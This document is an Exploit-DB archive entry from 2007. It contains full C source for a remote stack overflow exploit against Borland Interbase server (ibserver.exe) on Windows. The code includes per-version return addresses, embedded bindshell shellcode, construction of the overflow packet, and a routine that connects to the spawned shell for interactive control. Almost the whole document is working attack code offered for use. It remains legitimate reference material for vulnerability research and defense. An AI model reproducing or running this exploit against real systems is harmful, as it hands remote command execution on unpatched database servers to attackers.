Borland Interbase 2007 SP1 - Create-Request Remote Overflow

EDB-ID:

4247

CVE:

N/A

Author:

BackBone

Type:

remote

Platform:

Windows

Published:

2007-07-30

/*

	http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064882.html

	Groetjes aan mijn sletjes: Doopie, Sjaakhans, [PS] en Sleepwalker :P
	All your base are belong to FD2K2!

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")

#define IB_PORT "3050"
// 0xFF - 0x8, jmp 8 bytes back
#define JMP "\x90\x90\xEB\xF7"
// 0xFFFFFFFF - (sizeof(shellcode) + BIG_JMP SIZE), jmp to beginning of shellcode
CHAR BIG_JMP[]="\xE9\xFF\xFF\xFF\xFF";
// BIG_JMP SIZE
#define BIG_JMP_SIZE 5

CHAR ASCII_SHIT[]=
"\r\n                   >__            _      ___\r\n"
"                  / __\\26/07/2007| | __ / __\\ ___  _ __   ___ \r\n"
"                 /__\\/// _` |/ __| |/ //__\\/// _ \\| '_ \\ / _ \\\r\n"
"                / \\/  \\ (_| | (__|   </ \\/  \\ (_) | | | |  __/\r\n"
"                \\_____/\\__,_|\\___|_|\\_\\_____/\\___/|_| |_|\\___>\r\n"
"                     _______________BackBone_(c)_2007_______\r\n\r\n";

struct
{
	char* cVersion;
	DWORD dwRet;
	DWORD dwLength1;
	DWORD dwLength2;
}
targets[]=
{
	{"Interbase Server 2007 <=SP1 v8.0.0.123-w32 (UNIVERSAL)",0x403D4D,2108,0x2000}, // pop,pop,ret ibserver.exe v8.0.0.123
	{"Interbase Server v7.5.0.129-w32 (UNIVERSAL)",0x403A5D,2108,0x2000}, // pop,pop,ret ibserver.exe v7.5.0.129
	{"Interbase Server v7.1.0.181-w32 (UNIVERSAL)",0x4039BD,1336,0x2000}, // pop,pop,ret ibserver.exe v7.1.0.181
	{"Interbase Server v6.0.1.6-w32 (UNIVERSAL) untested",0x403901,1336,0x2000}, // pop,pop,ret ibserver.exe v6.0.1.6
 },v;

// don't change the offset
#define PORT_OFFSET 170
#define BIND_PORT 10282

// bindshell shellcode from www.metasploit.com,mod by skylined
unsigned char shellcode[] =
  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
  "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
  "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
  "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
  "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
  "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
  "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
  "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
  "\x83\xc4\x5c\x61\xeb\x89";

#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p);

unsigned long lookupaddress(const char* pchost)
{
	unsigned long nremoteaddr = inet_addr(pchost);

	if (nremoteaddr == INADDR_NONE)
	{
		struct hostent* phe = gethostbyname(pchost);

		if (phe == 0)
			return INADDR_NONE;
		nremoteaddr = *((u_long*)phe->h_addr_list[0]);
	}
	return nremoteaddr;
}

void showusage(char* argv)
{
	int i;

	printf("[*] Usage: %s ip[:port] target [bindport]\r\n", argv);
	printf("[*] Standard port=%d, Standard bindport=%d.\r\n",atoi(IB_PORT),BIND_PORT);
	printf("[*] Targets:\r\n\r\n");
	for (i=0;i<(sizeof(targets)/sizeof(v));i++)
		printf("\t%2d: %s\r\n",i,targets[i].cVersion);
}

void showinfo(void)
{
	printf("%s",ASCII_SHIT);
	printf("    Borland Interbase ibserver.exe Create-Request Buffer Overflow Vulnerability\r\n");
	printf("                       Advisory provided by TPTI-07-13.\r\n");
	printf("                            Exploit by BackBone.\r\n\r\n");
}

/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
	int l;
	char buf[512];
	struct    timeval time;
	unsigned long    ul[2];

	time.tv_sec = 1;
	time.tv_usec = 0;

	while(1)
	{
		ul[0]=1;
		ul[1]=sock;

		l=select(0,(fd_set*)&ul,NULL,NULL,&time);
		if(l==1)
		{
			l=recv(sock,buf,sizeof(buf),0);
			if (l<=0)
			{
				printf("\r\n[-] connection closed.\n");
				return;
			}
			l=write(1,buf,l);
			if (l<=0)
			{
				printf("\r\n[-] connection closed.\n");
				return;
			}
		}
		else
		    {
			l=read(0,buf,sizeof(buf));
			if (l<=0)
			{
				printf("\r\n[-] connection closed.\n");
				return;
			}
			l=send(sock,buf,l,0);
			if (l<=0)
			{
				printf("\r\n[-] connection closed.\n");
				return;
			}
		}
	}
}

int main(int argc, char *argv[])
{
	char *host,*port;
	unsigned long ulip;
	WSADATA wsa;
	SOCKET s;
	struct sockaddr_in sock_in;
	char buffer[16384];
	int bind,type;
	unsigned int size=0;
	DWORD dwLen1,dwLen2;
	DWORD dwBigJmp=0xFFFFFFFF;
	int i;

	showinfo();

	if (argc<3 || argc>4)
	{
		showusage(argv[0]);
		return -1;
	}

	host=strtok(argv[1],":");
	if((port=strtok(NULL,":"))==0)
		port=IB_PORT;

	if (WSAStartup(MAKEWORD(1,0),&wsa)!=0)
	{
		printf("[-] WSAStartup() error.\r\n");
		return -1;
	}

	ulip=lookupaddress(host);
	if (ulip==INADDR_ANY || ulip==INADDR_NONE)
	{
		printf("[-] invalid ip or host.\r\n");
		return -1;
	}

	if (atoi(port)<0 || atoi(port)>65534)
	{
		printf("[-] invalid port.\r\n");
		return -1;
	}

	type=atoi(argv[2]);
	if (type>(sizeof(targets)/sizeof(v))-1 || type<0)
	{
		printf("[-] invalid target type.\r\n");
		return -1;
	}

	printf("[+] Target: %s\r\n",targets[type].cVersion);

	bind=BIND_PORT;
	if (argc==4)
	{
		if (atoi(argv[3])>0 && atoi(argv[3])<65535)
			bind=atoi(argv[3]);
	}
	SET_BIND_PORT(bind);

	s=socket(AF_INET, SOCK_STREAM,0);
	if (s==INVALID_SOCKET)
	{
		printf("[-] socket() error.\r\n",s);
		return -1;
	}

	sock_in.sin_port=htons((u_short)atoi(port));
	sock_in.sin_family=AF_INET;
	sock_in.sin_addr.s_addr=ulip;

	printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,
		(ulip>>16)&0xff,(ulip>>24)&0xff,atoi(port));

	if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)
	{
		printf("Failed!\r\n");
		closesocket(s);
		WSACleanup();
		return -1;
	}

	printf("Ok.\r\n");

	// constructing the buffer
	memset(buffer,0,16384);

	memcpy(buffer,"\x00\x00\x00\x14\x00\x00\x00\x03",8);
	size+=8;

	dwLen1=htonl(targets[type].dwLength1+(sizeof(DWORD)*3));

	memcpy(buffer+size,&dwLen1,sizeof(DWORD));
	size+=sizeof(DWORD);

	memset(buffer+size,0x90,targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE));
	size+=targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE);

	// shellcode
	memcpy(buffer+size,shellcode,sizeof(shellcode));
	size+=sizeof(shellcode);

	// jump to shellcode (0xFFFFFFFF - (sizeof(shellcode)+BIG_JMP_SIZE)
	dwBigJmp-=sizeof(shellcode)+BIG_JMP_SIZE;
	// prepare jump code
	memcpy(BIG_JMP+1,&dwBigJmp,sizeof(DWORD));
	// write big jump code
	memcpy(buffer+size,BIG_JMP,BIG_JMP_SIZE);
	size+=BIG_JMP_SIZE;

	// jmp 8 bytes back
	memcpy(buffer+size,JMP,sizeof(DWORD));
	size+=sizeof(DWORD);

	// return addr
	memcpy(buffer+size,&targets[type].dwRet,sizeof(DWORD));
	size+=sizeof(DWORD);

	memset(buffer+size,0xFF,sizeof(DWORD));
	size+=sizeof(DWORD);

	dwLen2=htonl(targets[type].dwLength2);

	memcpy(buffer+size,&dwLen2,sizeof(DWORD));
	size+=sizeof(DWORD);

	memset(buffer+size,0x90,targets[type].dwLength2);
	size+=targets[type].dwLength2;

	printf("[+] Sending buffer (len: %u) ... ",size);

	if (!send(s,buffer,size,0))
	{
		printf("Failed.\r\n");
		closesocket(s);
		WSACleanup();
		return -1;
	}

	printf("Ok.\r\n");

	closesocket(s);

	Sleep(1000);

	printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,
				(ulip>>16)&0xff,(ulip>>24)&0xff,bind);

	s=socket(AF_INET, SOCK_STREAM,0);
	if (s==INVALID_SOCKET)
	{
		printf("socket() error.\r\n",s);
		WSACleanup();
		return -1;
	}

	sock_in.sin_port=htons((u_short)bind);
	sock_in.sin_family=AF_INET;
	sock_in.sin_addr.s_addr=ulip;

	if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)
	{
		printf("Failed!\r\n");
		closesocket(s);
		WSACleanup();
		return -1;
	}

	printf("Ok!\r\n\r\n--- w000t w000t ---\r\n\r\n");

	shell(s);

	closesocket(s);

	WSACleanup();

	return 0;
}

// milw0rm.com [2007-07-30]